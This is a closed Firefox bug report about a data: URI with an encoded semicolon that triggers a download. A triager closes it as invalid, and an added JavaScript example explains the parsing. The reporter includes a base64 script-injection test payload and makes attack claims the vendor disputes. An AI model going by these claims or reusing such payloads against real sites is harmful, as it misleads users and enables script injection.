Closed Bug 1351018 Opened 8 years ago Closed 8 years ago

Data Scheme URI + Automatic Download

Categories

(Firefox :: Untriaged, defect)

50 Branch
defect
Not set
normal

RESOLVED INVALID

People

(Reporter: anasmahmood999, Unassigned)

Attachments

(1 file)

Attached video mfd.avi
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161208153507
Firefox for Android

Steps to reproduce:

The Data URI Scheme executes script using 'text/html', which makes the browser render it as a webpage. A hacker or attacker can perform several types of malware attacks by taking advantage of the Data URI Scheme, which could result in UXSS, open redirection, spoofing and others.

We can do everything with data URI OK...

Now today, when I was playing with data URIs and typed the URI in the search bar of the browser, "daTa:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%23http://", the browser downloaded it as a file. This occurs due to the (;) URL-encoded as (%3B) after html.

Through this, an attacker can take advantage and download malicious files to the victim's PC. This vulnerability exists in all versions of Firefox 52 latest. I also checked this bug on other browsers, but it only exists in Mozilla Firefox.

Actual results:

URI Download

Expected results:

URI should not download
This appears to be working as specified. We are exploring changing the URL inheritance of data: URIs in other bugs. In your second issue there are several legitimate ways to trigger a download; this is not a danger. You could, for example, use data:application/octet-stream;base64,blablah. In your case the %3B makes us see "html%3bbase64" run together. Since we don't have a handler for that content-type we offer to download it in case the user has a local program that can handle it. A web page could also use the "download" attribute on a link to force a download for whatever type of URL it is.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
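
The content-type handling described in the reply above, as an added example that is not part of the original bug or Firefox's code: a simplified JavaScript model of RFC 2397 parsing that shows why an encoded `%3B` ends up inside the media type. The `RENDERABLE` handler table, the function names and the sample payload are assumptions made for illustration.

```javascript
// Added illustration; a simplified model, not Firefox source code.
// Content types this hypothetical browser renders inline (assumption).
const RENDERABLE = new Set(["text/html", "text/plain", "image/png"]);

// Split a data: URI per RFC 2397: data:[<mediatype>][;base64],<data>
function parseDataUri(uri) {
  const m = /^data:([^,]*),([\s\S]*)$/i.exec(uri);
  if (!m) throw new Error("not a data: URI");
  // Parameters are delimited by a literal ';'. An encoded %3B is not a
  // delimiter, so it stays inside the media type token.
  const parts = m[1].split(";");
  const mediaType = (parts.shift() || "text/plain").trim().toLowerCase();
  const params = parts.map((p) => p.trim().toLowerCase());
  return { mediaType, base64: params.includes("base64"), body: m[2] };
}

// Decide what the modelled browser does: render a known type inline,
// otherwise offer the content as a download.
function dispositionFor(uri) {
  const { mediaType } = parseDataUri(uri);
  return RENDERABLE.has(mediaType) ? "render" : "download";
}

// Constructed samples; the payload is base64 of "<p>hi</p>".
const samples = [
  "data:text/html;base64,PHA+aGk8L3A+",
  "daTa:text/html%3Bbase64,PHA+aGk8L3A+",
  "data:application/octet-stream;base64,PHA+aGk8L3A+",
];
for (const s of samples) {
  const p = parseDataUri(s);
  console.log(`${p.mediaType} base64=${p.base64} -> ${dispositionFor(s)}`);
}
```
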